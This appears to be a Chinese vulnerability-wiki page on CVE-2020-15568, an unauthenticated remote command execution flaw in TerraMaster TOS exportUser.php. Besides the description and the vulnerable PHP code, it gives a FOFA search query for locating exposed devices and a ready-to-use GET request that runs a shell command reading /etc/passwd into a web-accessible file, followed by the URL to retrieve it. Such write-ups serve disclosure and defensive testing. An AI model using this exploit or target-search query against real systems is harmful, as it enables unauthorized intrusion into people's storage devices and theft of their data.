menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right TerraMaster chevron_right TerraMaster TOS exportUser.php 远程命令执行.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    TerraMaster TOS exportUser.php 远程命令执行.md
    2 KB / 2021-07-04 06:01:08
        # TerraMaster TOS exportUser.php 远程命令执行 CVE-2020-15568
    
    ## 漏洞描述
    
    TerraMaster TOS exportUser.php 文件中存在远程命令执行漏洞
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > TerraMaster TOS < 4.1.24
    
    ## FOFA
    
    > [!NOTE]
    >
    > "TerraMaster" && header="TOS"
    
    ## 漏洞复现
    
    出现漏洞的文件 ***exportUser.php***
    
    ```php
    <?php
        include_once "./app.php"; // [1] autoload classes
        class CSV_Writer{
            ...
        }
        $type = $_GET['type'];
        $csv = new CSV_Writer();
        if($type == 1){
            $P = new person();
            $data = $P->export_user($_GET['data']);
            $csv->exportUser($data);
        } else if($type == 2) {
            $P = new person();
            $data = $P->export_userGroup($_GET['data']);
            $csv->exportUsergroup($data);
        } else { // [2] type value is bigger than 2
            //xlsx通用下载
            $type = 0;
            $class = $_GET['cla'];
            $fun = $_GET['func'];
            $opt = $_GET['opt'];
            $E = new $class();
            $data = $E->$fun($opt); // [3] vulnerable code call
            $csv->exportExcel( $data['title'], $data['data'], $data['name'], $data['save'], $data['down']);
        }
    ?>
    ```
    
    在其他文件的代码检查期间,也发现有一种方法可以利用TOS软件中预先存在的类来利用此问题。
    位于**include/class/application.class.php**中的PHP类是在运行TOS软件的设备上执行命令的最佳人选。
    
    由于*exportUser.php*没有身份验证控件,因此未经身份验证的攻击者有可能通过提供以下值作为HTTP GET参数来实现代码执行。
    
    ```
    http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt
    ```
    
    返回200后再次访问
    
    ````
    http://xxx.xxx.xxx.xxx/include/test.txt
    ````
    
    ![](http://wikioss.peiqi.tech/vuln/tm-9.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    links
    file_download